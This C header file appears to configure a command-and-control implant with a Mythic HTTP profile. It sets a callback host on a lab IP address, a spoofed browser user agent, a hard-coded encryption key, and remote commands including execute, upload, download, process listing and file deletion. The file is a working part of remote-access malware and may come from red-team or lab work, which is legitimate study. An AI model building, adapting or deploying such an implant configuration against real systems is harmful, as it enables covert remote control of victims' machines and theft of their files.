#ifndef CONFIG_H
#define CONFIG_H

// #define PIC_BUILD
#define PROFILE_MYTHIC_HTTP
#define CONFIG_SLEEP 3
#define CONFIG_SLEEP_JITTER 0
#define CONFIG_HOST L"192.168.56.112"
#define CONFIG_UA L"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
#define CONFIG_POST_URI L"/data"
#define CONFIG_UUID "9ed9825a-5fec-42d6-82a4-80bf77c20848"
#define CONFIG_ENCRYPT_KEY { 0x42, 0x51, 0xb2, 0xc8, 0x19, 0x2e, 0x6d, 0xf8, 0xa1, 0xac, 0xe0, 0x5d, 0xbb, 0xc1, 0x7b, 0x60, 0xa8, 0x80, 0x62, 0xef, 0x96, 0xfa, 0xaa, 0xd6, 0x69, 0x50, 0xde, 0x5c, 0x92, 0x57, 0xa2, 0x68 }
#define REQUIRE_DLL_NTDLL
#define REQUIRE_DLL_KERNEL32
#define REQUIRE_DLL_WININET
#define REQUIRE_DLL_IPHLPAPI
#define REQUIRE_DLL_ADVAPI32
#define REQUIRE_DLL_WS2_32
#define REQUIRE_DLL_BCRYPT
#define INCLUDE_CMD_EXECUTE
#define INCLUDE_CMD_IPINFO
#define INCLUDE_CMD_MV
#define INCLUDE_CMD_MKDIR
#define INCLUDE_CMD_EXIT
#define INCLUDE_CMD_CP
#define INCLUDE_CMD_LS
#define INCLUDE_CMD_RM
#define INCLUDE_CMD_PWD
#define INCLUDE_CMD_SLEEP
#define INCLUDE_CMD_UPLOAD
#define INCLUDE_CMD_WHOAMI
#define INCLUDE_CMD_AGENTINFO
#define INCLUDE_CMD_CD
#define INCLUDE_CMD_DOWNLOAD
#define INCLUDE_CMD_LISTDRIVES
#define INCLUDE_CMD_HOSTNAME
#define INCLUDE_CMD_PS
#define INCLUDE_CMD_EXECUTE_HBIN

#endif
